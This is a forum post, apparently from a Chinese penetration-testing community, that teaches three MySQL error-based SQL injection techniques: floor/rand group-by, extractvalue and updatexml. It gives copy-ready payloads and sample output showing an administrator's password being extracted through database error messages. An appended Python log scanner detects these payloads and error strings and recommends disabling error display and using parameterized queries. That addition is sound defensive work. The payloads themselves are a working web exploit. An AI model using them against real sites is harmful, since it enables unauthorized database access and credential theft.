中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Three ways to trigger error-based disclosure during MySQL injection

Author: admin    Time: 2012-12-10 10:28

Posting some of my old notes. MySQL throws an error message when a statement fails, and sites built on PHP+MySQL often display that error text on the page, so specific data can be extracted by constructing queries in the following three ways.
Test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor
The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement can be used to trigger the error.

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
The MySQL version has been disclosed through the error. To query other data, replace the expression in the position of version(). For example, to retrieve the administrator username and password:
Method1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
That's all; thanks to the foreign guys.
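Added example (not part of the original post, and not the author's code): a Python detector that runs over constructed application log lines and recognizes the three techniques described above. It matches the request side (the floor/rand group-by shape, extractvalue, updatexml) and, separately, the response side (the MySQL "Duplicate entry ... for key 'group_key'" and "XPATH syntax error" texts), then recovers what the error message actually disclosed by undoing the framing each technique adds. The log format, the sample lines and the function names are assumptions made for this example; the payload shapes and error strings mirror the ones shown in the post.

```python
import re
from typing import Dict, List, Optional

# Constructed sample log (assumption): one line per request,
# "<decoded query string> | response=<first line of the response body>".
# The payloads and error strings mirror those in the post; the lines themselves are made up.
SAMPLE_LOG = """\
id=1 | response=<html>article 1</html>
id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) | response=ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
id=1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1))) | response=ERROR 1105 (HY000): XPATH syntax error: '\\admin888'
id=1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1)) | response=ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
id=2 | response=<html>article 2</html>
"""

# Request-side signatures for the three techniques in the post.
FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\(", re.I)
GROUP_BY = re.compile(r"group\s+by", re.I)
EXTRACTVALUE = re.compile(r"\bextractvalue\s*\(", re.I)
UPDATEXML = re.compile(r"\bupdatexml\s*\(", re.I)

# Response-side signatures: the MySQL error text that carries the disclosed value.
DUPLICATE_ENTRY = re.compile(r"Duplicate entry '(.*)' for key 'group_key'")
XPATH_ERROR = re.compile(r"XPATH syntax error: '(.*)'")


def classify_request(param: str) -> Optional[str]:
    """Name the technique whose request-side signature matches, or None for a clean request."""
    if EXTRACTVALUE.search(param):
        return "extractvalue"
    if UPDATEXML.search(param):
        return "updatexml"
    if FLOOR_RAND.search(param) and GROUP_BY.search(param):
        return "floor_group_by"
    return None


def leaked_value(response: str) -> Optional[str]:
    """Recover the fragment the error message disclosed, undoing the framing each technique adds."""
    m = DUPLICATE_ENTRY.search(response)
    if m:
        value = m.group(1)
        # floor(rand(0)*2) appends a 0 or 1 to the group key; that digit is not part of the data
        return value[:-1] if value[-1:] in ("0", "1") else value
    m = XPATH_ERROR.search(response)
    if m:
        # the post prefixes 0x5c ("\") for extractvalue and wraps with 0x5e24 ("^$") for updatexml
        return m.group(1).strip("\\^$")
    return None


def scan_log(log_text: str) -> List[Dict[str, Optional[str]]]:
    """Return one finding per line whose request or response matches an error-based signature."""
    findings: List[Dict[str, Optional[str]]] = []
    for line in log_text.splitlines():
        if " | response=" not in line:
            continue
        param, response = line.split(" | response=", 1)
        technique = classify_request(param)
        leak = leaked_value(response)
        if technique is None and leak is None:
            continue  # ordinary request, ordinary page
        findings.append({"technique": technique or "unknown", "leaked": leak, "param": param})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['technique']:15s} leaked={finding['leaked']!r}")
```

Matching the response as well as the request is deliberate: the response-side hit is what confirms the error text reached the client, which is the condition all three techniques depend on. Turning off error display in the PHP+MySQL stack and using parameterized queries removes that channel; the detector then only fires on the request side, which is still useful for spotting probing.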
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2